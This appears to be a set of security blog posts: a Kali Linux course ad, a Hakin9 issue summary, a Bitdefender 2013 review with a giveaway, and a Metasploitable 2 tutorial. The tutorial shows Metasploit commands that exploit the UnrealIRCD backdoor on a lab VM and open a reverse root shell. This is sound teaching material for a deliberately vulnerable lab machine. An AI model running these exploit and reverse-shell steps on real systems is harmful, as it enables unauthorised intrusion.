Video Training: Kali Linux – Assuring Security by Penetration Testing

Want to learn computer security and don’t know where to start? Want to learn some of the latest hacking and pentesting techniques using Kali Linux? Know security pretty well, but want to brush up on your skills and see what the new Kali Linux has to offer?

And all at a very affordable price?

Then look no further than “Kali Linux – Backtrack Evolved: Assuring Security by Penetration Testing“. 

The teacher, Justin Hutchens is a bright young rising infosec star. I had the absolute honor to work on Justin’s training class as a technical reviewer, and can honestly tell you that you are going to be engaged, and you are going to learn some great material from a very impressive, easy to follow and capable teacher.

The course covers almost 3 hours of hands on learning that will teach you how to:

  • Prepare a fully-functional and low-budget security lab, where you can practice and develop your penetration testing skills without fear of legal consequence
  • Gather information about a target with advanced reconnaissance techniques
  • Identify target systems on a network using host discovery tools
  • Identify services running on target systems by scanning and enumeration
  • Discover vulnerabilities to determine potential attack vectors
  • Launch automated exploits and payloads using the Metasploit Framework
  • Learn a variety of hands-on techniques to exploit target systems
  • Establish backdoors to ensure continued access
  • Escalate privileges to acquire maximum control over compromised systems

For pricing and more information see the PacktPub Website.

Check it out!

Advertisements

Hakin9 Exploiting Software September Issue is out!

Another excellent issue of Hakin9 Exploiting Software is here!

Check out these exciting articles:

Windows 8 Security in Action
By Daniel Dieterle

In this issue I wrote the article “Windows 8 Security in Action” which gives a short look at the new Windows 8 look for those who haven’t seen it yet and then delve into its updated security features and lingering security issues from previous versions of Windows:

Is Windows 8 the next operating system for your enterprise? In this article, we will take a quick look at Microsoft’s new OS – Windows 8. We will see some of the new security features that make it more secure than its predecessor Windows 7. We will also run the security through the paces and see some of the possible issues that are new to the OS and some that have carried over from previous versions of Windows. From the Backtrack 5 r3 security testing platform, the author uses the Metasploit Framework and Social Engineering Toolkit to see how Windows 8 stands up to the most common internet based threats.

Raspberry Pi Hacking
By Jeremiah Brott

Follow this guide at your own risk. I take no responsibility for any outcome from anything you attempt to do within this guide – says the author. The Raspberry Pi is a credit-card sized computer that plugs into your TV and a keyboard. It’s a capable little PC which can be used for many of the things that your desktop PC does, like spreadsheets, word-processing and games. It also plays high-definition video. We want to see it being used by kids all over the world to learn programming. If you love your Pi you’ll definitely love to hack it.

Malware, Botnet and cyber threats, what is happening to the cyberspace?
By Pierluigi Paganini

The article proposes an analysis of the main cyber threats that worry security experts and that are profoundly changing the cyber space. The exponential growth of the number of cyber threats and attacks is rebutted by a wide range of statistical provided by reports published by the major security firms. The scenario is really scaring due concomitant action of cybercriminals, hacktivists and state sponsored hackers that are producing malware and botnets of increasing complexity.

Live Capture Procedures
By Craig Wright

Live data capture is an essential skill in required for both Incident Handlers as well as Forensic
practitioners and it is one that is becoming more, not less, important over time as we move towards networked and cloud based systems. This article has introduced a few tools that, although free, can be used together to create a powerful network forensics and incident response toolkit. Like all of these tools, the secret comes to practice.

  • SQL Injection By Wong Chon Kit
  • Network Pen Testing Breaking the Corporate Network through Hackers Perspective By Amar Wakharkar
  • Intel SMEP overview and bypass on Windows 8 By Artem Shikhin
  • Android Application Assessment By Nilesh Kumar

Check it out!

Metasploitable 2.0 Tutorial Part 3: Gaining Root from a Vulnerable Service

Continuing our tutorial series on Metasploitable 2, the purposefully vulnerable virtual machine used to learn security techniques, this time we will look at how to get root access from a vulnerable service.

We saw in previous tutorials how to scan a system for open ports with Nmap, and how to use Metasploit’s built in scanners to identify software revision levels.

I alluded to it earlier, so let’s take a look at UnrealIRCD sitting at port 6667. I chose this service for a few reasons. First of all there are numerous Metasploitable how-to’s out there, but a lot of them focus on the standard services. Secondly, in real life, which is the service that will most likely go unpatched? The main web server or some secondary service that was installed for a project and then forgotten about?

So let’s get started!

From the nmap scan we saw this output for Unreal ircd:

Let’s take the version number and do a search to see if there are any vulnerabilities or exploits that we can take advantage of. We can search the web, or we can search inside Metasploit using the “search” command. Let’s look at both!

First a quick Google search for “Unreal3.2.8.1 exploit” returns this:

Cute, this version of UnrealIRCD had a backdoor added to it. Well I think this is definitely worth trying, especially as it has an “Excellent” Metasploit rank, which basically means the exploit is very stable and works consistently. The exploit to use is listed further down Metasploit’s webpage, but we could find it by using the “Search” command in the Metasploit Framework as below:

As you can see there is only the one exploit in Metasploit for UnrealIRCD and it is the 3.2.8.1 backdoor exploit.

Excellent!

So, let’s “use” it and check the options:

All it needs is the remote host address:

set RHOST 192.168.12.20 (Metasploitable’s IP address)

Don’t forget to choose a payload for the exploit:

This command lists all the payloads that are compatible with this exploit. Unfortunately they are all command shell’s. A Meterpreter shell would be better than a command shell, and give us more options, but for now we will just use the generic reverse shell. This will drop us right into a terminal shell with the target when the exploit is finished.

set PAYLOAD generic/shell_reverse_tcp

For this payload all we need to do is set the LHOST command (the IP of our Backtrack Metasploit system) and then do a final “show options” to make sure everything is set okay:

Our RHOST (target) and LHOST (Attacker system that the shell will connect to) values are correctly set.

We are golden, now just type “exploit”:

Notice it says that a session is opened, but then it just gives you a blinking cursor. You are actually sitting in a terminal shell with the target machine. As you can see above, I typed “whoami” and the target system responded with “root”. The “Root” user is the highest level user that you can be on a Linux machine! It worked!

So to re-cap, we found an open service on the target machine. Searched for and found an exploit that works on the software version present. And finally, used the exploit and obtained a full remote shell.

All the standard Linux commands work with our shell that we have. But if you poke around a little bit, you will find that you are in the /etc/unreal directory (use the “pwd” command).  And it will not allow you out of this directory. Odd, but don’t forget that we are the Root user! We can make new users, or do almost anything else that we want.

* Update – Ran this using a different shell as a payload and was able to surf the directory structure without problems.

In the next tutorial I will show you how to grab information from the Linux machine using our foothold that will allow us to access other existing accounts and further exploit the system.

Until next time!

Bitdefender Total Security 2013 Review and License Give Away!

Take one of the best anti-virus products out there and integrate a ton of client and online security add-ins and what do you have? Bitdefender Total Security 2013!

Again this year, Bitdefender has provided Cyberarms a review copy of its latest Total Security product for us to put through the ringer, and again it did not disappoint.

Okay, I am not going to spend a lot of time covering the antivirus engine this year. We covered the 2012 version and it received top marks. Even PC Mag gave Bitdefender’s Antivirus Plus 2013 its Editor’s Choice Award. This year I want to spend more time covering some of the new and updated features.

I will say though that the 2013 release seems just as robust against malware and phishing attempts, and better in some circumstances. In testing, 2013 correctly detected some compressed exploit files from a security conference that were in a huge zipped compilation. The drive was scanned with 2012 and the files were not detected.

Actually, Bitdefender anti-virus is the bane of my security research existence. 🙂

Let me explain.

I use Bitdefender on a couple dual purpose machines that are also used for security research.

I have to uninstall (not turn off!) Bitdefender from these machines when I play with Backtrack 5 and the Metasploit Framework. No matter how many times I encode or pack a malicious payload with Metasploit, Bitdefender catches and blocks it. And this is with Backtrack running in a virtual machine. Even with active scanning and the firewall service turned off, it still identifies and quarantines the payload. I have to completely uninstall Bitdefender from the machines to be able to perform Metasploit mayhem with them.

My only qualm about the anti-virus is that it seems to take a very long time to perform a full scan. But I usually set the scan engine to aggressive and scan every file.

The Anti-Virus engine is excellent, let’s move on.

Administrator Control Panel

One of the first things you will notice, if you are logged in as an administrator, is the control panel interface. The red “x” means that there is an issue that should be taken care of right away.

In this instance, the virus update had not been run in several days.

Simply clicking on the center of the control panel shows you what the issue is and how to remedy it.

The number in red tells you that there are events that should be reviewed, and how many there are to check.

Firewall activity – Displays a bar graph of Firewall activity. If you click on the Firewall Activity button, you can modify firewall settings, change rules or check network activity. They also have a pretty nifty “Paranoid Mode” that allows you to view every communication attempt with the option to either block or allow. This could be handy if you are investigating a possible breach in progress or monitoring strange communications.

Scanner Activity – The progress bar on the right side of the control panel shows scanning progress. Clicking on the scanner activity button allows you to view and modify anti-virus settings.

What is great is if you have a suspicious file or folder, you can just drag and drop it on the control panel and Bitdefender will scan it for you.

If there are no issues or event news, the control panel will look like this:

Finally, clicking on the ID Badge at the bottom will take you to the My Bitdefender page.

My Bitdefender

Apart from malware and e-mail phishing attempts, Identity Theft, and social engineering attempts through social media sites are top targets for the cyber criminal.

Twitter and Facebook protection are included in Total Security 2013. Just run through the quick setup in each and Bitdefender protection is extended to these social media programs. Incoming links from these sites are scanned for threats. Setup is fairly quick, and like all Bitdefender applets, it runs silently in the background.

Safebox brings Dropbox like features to Bitdefender. You get 2GB of free encrypted cloud storage included. It is very easy to create new folders, upload data and share files with other PCs, or mobile devices. It even gives you a Windows like Recycle Bin in case you deleted a file and change your mind.

SafePay

What a great idea, whenever you go to do online secure banking transactions, Bitdefender drops you into a barricaded session that protects both your wireless session if you are on Wi-Fi and a virtual keyboard to protect it from being sniffed by hackers.

Though an incredible idea, I did have problems with this. When your computer enters this protected Safepay session, you enter a sandboxed browser. Getting back out of it though, to check an account validation e-mail for example, was not very intuitive.

Once I exited the sandboxed session to get my validation e-mail so I could log in, it created a new session with my banking provider, so I would have needed another validation e-mail.

Though not perfect, this is a huge move in the right direction. Especially for PC users that need to use public networks for banking or shopping.

 Mobile Anti-Theft

Another new cool feature, Bitdefender allows you to view the location of your PC or mobile device, and gives you the option of remotely locking it or even wiping it. After installing the Anti-Theft app, the location of your device shows up on a Google map. Though not completely accurate for a PC without GPS (my computer showed up about a mile away from my house), this could be very handy for locating lost or stolen Mobile devices.

Conclusion

This was just a quick look at some of Bitdefender Total Security features. There are several others that I did not mention. If you want one of the best anti-malware solutions loaded with extra security features, that doesn’t inundate you with pop up warnings and messages, look no further than Bitdefender Total Security 2013!

GIVEAWAY

Want a chance to win a license for a full copy of Total Security 2013? Cyberarms in conjunction with Bitdefender is giving away 5 licenses of the award winning software. Simply share a link to this review on your favorite social media site. Then place a copy of the link in the comments field below. Winners will be chosen at random in two weeks (August 9th) from links in the comments section.

Don’t want to wait, why not try out Bitdefender’s excellent protection now? Go to Bitdefender’s website and click the “Try it FREE” link to download a time limited trial.

*** The contest is now over, congrats to our winners! ***